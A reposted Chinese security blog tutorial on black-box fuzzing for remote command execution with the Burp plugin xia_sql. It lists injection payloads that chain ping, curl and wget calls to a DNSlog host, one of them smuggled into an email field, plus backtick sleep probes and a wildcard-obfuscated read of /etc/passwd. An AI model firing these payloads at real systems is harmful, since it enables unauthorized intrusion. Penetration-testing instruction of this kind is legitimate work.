黑盒fuzz小技巧之RCE

admin 2024年11月25日10:24:51评论24 views字数 787阅读2分37秒阅读模式

准备工作

一、一个插件:https://github.com/smxiazi/xia_sql。有的臭宝要发问了:这不是sqli检测插件吗,跟rce有什么关系。

内心os:wcnmlgbzdsbwywclzmgnzql(有人能完全解读吗)

注意:下载自己burp jdk版本对应的插件

黑盒fuzz小技巧之RCE

二、几个好用payload

2.1 ping命令---这里可以用这种方式直接组合起来,不管前一个命令是否失败,后面的命令都会执行哟。

;ping ac1s8h4y.eyes.sh|ping ac1s8h4y.eyes.sh&ping ac1s8h4y.eyes.sh

;curl  http://ac1s8h4y.eyes.sh|curl http://ac1s8h4y.eyes.sh&curl http://ac1s8h4y.eyes.sh

2.2 sleep命令---使用反引号执行命令

`sleep(5)`

;`sleep(5)`|`sleep(5)`&`sleep(5)`

2.3 邮箱命令注入

`wget ac1s8h4y.eyes.sh`@qq.com

配置插件

将上面的payload填入自定义区域,然后按图中箭头这样勾选,最后一定要点一下加载/重新加载payload哦!

so我们主要利用这个插件给所有的参数插满payload

这样就搞好了,下面像一只猴子一样在网站上到处点点点,尽可能测试所有的功能点,然后看看dnslog平台有木有消息。

黑盒fuzz小技巧之RCE

黑盒fuzz小技巧之RCE

文件上传处

xia_sql查看,发现有一个请求包一支独秀,存在很长的延时。

黑盒fuzz小技巧之RCE

重发数据包进一步确认,延迟成功,漏洞存在。

黑盒fuzz小技巧之RCE

某网络设备rce

xia_sql配置这个poc:/???/?at /etc/pass??探测到了passwd文件(图找不到了)

回显类探测根据返回包长度差异找到这个数据包

黑盒fuzz小技巧之RCE

然后于是直接写入文件,poc如下:

黑盒fuzz小技巧之RCE

 

原文始发于微信公众号(rainy的安全小屋):黑盒fuzz小技巧之RCE

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月25日10:24:51
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   黑盒fuzz小技巧之RCEhttps://cn-sec.com/archives/3432983.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息